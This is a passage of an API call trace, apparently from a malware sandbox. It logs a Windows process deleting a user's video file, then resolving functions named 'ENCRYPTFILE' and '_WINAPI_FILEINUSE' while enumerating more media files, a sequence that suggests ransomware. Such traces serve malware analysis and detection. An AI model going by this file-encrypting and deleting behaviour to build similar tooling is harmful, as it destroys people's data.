[0097.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0097.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d8c0 [0097.915] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\8PG6kQ2SW4h7w.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\8pg6kq2sw4h7w.flv")) returned 0x20 [0097.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0097.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0097.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0097.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0097.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0097.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0097.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0097.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0097.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0097.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0097.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0097.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431de60 [0097.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0097.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a608 [0097.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0097.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369cc0 [0097.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431de60 | out: hHeap=0x1780000) returned 1 [0097.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0097.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0097.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0097.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0097.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0097.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0097.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0097.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0097.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0097.916] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\8PG6kQ2SW4h7w.flv", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcf9a80, ftCreationTime.dwHighDateTime=0x1d5e5d4, ftLastAccessTime.dwLowDateTime=0x562e60b0, ftLastAccessTime.dwHighDateTime=0x1d5ef80, ftLastWriteTime.dwLowDateTime=0x562e60b0, ftLastWriteTime.dwHighDateTime=0x1d5ef80, nFileSizeHigh=0x0, nFileSizeLow=0x139d5, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="8PG6kQ2SW4h7w.flv", cAlternateFileName="8PG6KQ~1.FLV")) returned 0x41ac2c0 [0097.916] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\8PG6kQ2SW4h7w.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\8pg6kq2sw4h7w.flv")) returned 1 [0097.978] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcf9a80, ftCreationTime.dwHighDateTime=0x1d5e5d4, ftLastAccessTime.dwLowDateTime=0x562e60b0, ftLastAccessTime.dwHighDateTime=0x1d5ef80, ftLastWriteTime.dwLowDateTime=0x562e60b0, ftLastWriteTime.dwHighDateTime=0x1d5ef80, nFileSizeHigh=0x0, nFileSizeLow=0x139d5, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="8PG6kQ2SW4h7w.flv", cAlternateFileName="8PG6KQ~1.FLV")) returned 0 [0097.979] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0097.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369cc0 | out: hHeap=0x1780000) returned 1 [0097.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0097.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0097.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d8c0 | out: hHeap=0x1780000) returned 1 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0097.980] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0097.980] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf400 | out: hHeap=0x1780000) returned 1 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5358 | out: hHeap=0x1780000) returned 1 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0097.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0097.980] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0097.980] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0097.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0097.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0097.981] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0097.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0097.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0097.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0097.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2450 [0097.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0097.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0097.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0097.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0097.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0097.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0097.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0097.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0097.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c10 [0097.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0097.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0097.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0097.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0097.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100) returned 0x4181178 [0097.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c10 | out: hHeap=0x1780000) returned 1 [0097.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0097.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0097.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0097.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0097.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e18 [0097.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0097.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0097.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0097.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0097.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0097.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0097.982] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0097.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0097.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0097.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0097.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0097.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0097.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0097.982] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0097.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0097.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0097.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0097.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0097.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0097.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0097.982] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9ua4aLpWeNEQZn vUIUd.mkv", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e54f3e0, ftCreationTime.dwHighDateTime=0x1d5e735, ftLastAccessTime.dwLowDateTime=0xdcb950a0, ftLastAccessTime.dwHighDateTime=0x1d5eb24, ftLastWriteTime.dwLowDateTime=0xdcb950a0, ftLastWriteTime.dwHighDateTime=0x1d5eb24, nFileSizeHigh=0x0, nFileSizeLow=0x9e42, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="9ua4aLpWeNEQZn vUIUd.mkv", cAlternateFileName="9UA4AL~1.MKV")) returned 0x41ac500 [0097.983] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0097.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0097.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0097.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0097.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0097.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0097.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0097.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0097.983] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0097.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0097.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0097.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0097.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2440 [0097.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0097.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0097.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0097.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0097.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0097.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e48 [0097.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0097.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0097.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0097.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0097.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0097.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0097.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0097.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0097.984] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0097.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0097.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0097.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0097.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0097.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0097.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0097.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0097.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0097.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0097.985] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0097.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0097.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0097.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0097.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0097.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0097.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0097.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0097.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0097.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24e0 [0097.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0097.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2360 [0097.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0097.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c08 [0097.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0097.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0097.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0097.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0097.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0097.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0097.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0097.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0097.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0097.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0097.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0097.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0097.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0097.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0097.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0097.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0097.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0097.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0097.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0097.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0097.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0097.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0097.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0097.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0097.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0097.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0097.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0097.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0097.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0097.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0097.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0097.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0097.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0097.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0097.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0097.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0097.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0097.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0097.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0097.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0097.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0097.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0097.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0097.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0097.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0097.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0097.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0097.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0097.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0097.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0097.988] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0097.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 